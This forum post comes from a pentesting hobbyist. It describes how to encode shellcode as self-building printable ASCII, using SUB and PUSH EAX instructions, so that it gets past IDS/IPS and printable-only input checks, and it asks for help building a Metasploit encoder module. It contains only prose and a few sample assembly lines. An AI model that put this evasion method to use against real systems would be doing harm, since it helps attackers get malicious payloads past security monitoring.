Hi, guys. In my travels and adventures into the exciting world of pentesting, I've come across something I feel is cool. So here's the deal.
I've looked through the encoding tools in the msframework, those that were described in Metasploit: The Penetration Tester's Guide, and those that were described in Grey Hat Hacking...
What I've noticed is that they pretty much all follow the same standard: XOR against a key, with the final exploit looking like this:
encrypted shellcode->decryption loop->decrypted shellcode
The program decrypts itself then jumps to the new shellcode and runs.
All very nice and pretty. But...
This won't bypass systems using advanced IPS/IDS to monitor packets, and it also won't pass validation on a printable charset only lookup.
So, Hacking: A Guide to Exploitation gives a solution that I have yet to see implemented. Namely, self-building shellcode. Meaning, the shellcode builds itself using only printable chars.
Something like this: Since PUSH EAX, SUB EAX, and a few others all correspond to printable ASCII chars, we can zero out EAX, then subtract by way of rollover to get EAX to the instruction set we want, then push it to the stack. This usually only takes 3 SUB's for each 4 bytes to push to stack. By subtracting to the last four bytes of SC(shellcode) then pushing to stack, and moving on to the next four, until all is pushed to stack, we can bypass all those mentioned protection systems.
The next step would either be to SUB to 4 NOP's and PUSH EAX until the SC overwrites itself and slides down to the payload, or just to JMP to the actual payload immediately.
To set the actual subtraction to the correct only printable bytes usually doesn't take more than three instructions since the ascii charset can be used to subtract, obviously. Looking something like this:
SUB EAX,0x41434547 (f - D C B A or something very similar I hexdumped this from SUB EAX,0x41424344 compiled with NASM)
PUSH EAX (the last four bytes)
PUSH EAX (the next four bytes)
until all the SC is written. All this being contained within a printable string.
What I want to do is write a metasploit module to take a given payload, and make it self-building.
What I want from the community is :
I've never written a metasploit module, programmed in ruby, or done anything like this really. I want to know if it's a good idea, if it's implementable, and if people are interested.
I'm willing to put in work, but I don't know enough to do this on my own. Please help, people.
Will this work? What is the best way to implement it?
4)General suggestions and improvements
I understand that this may only be practical on non-exe(i.e. only standard network) exploits, but if it helps the success of even those, why not do it.
Let me know.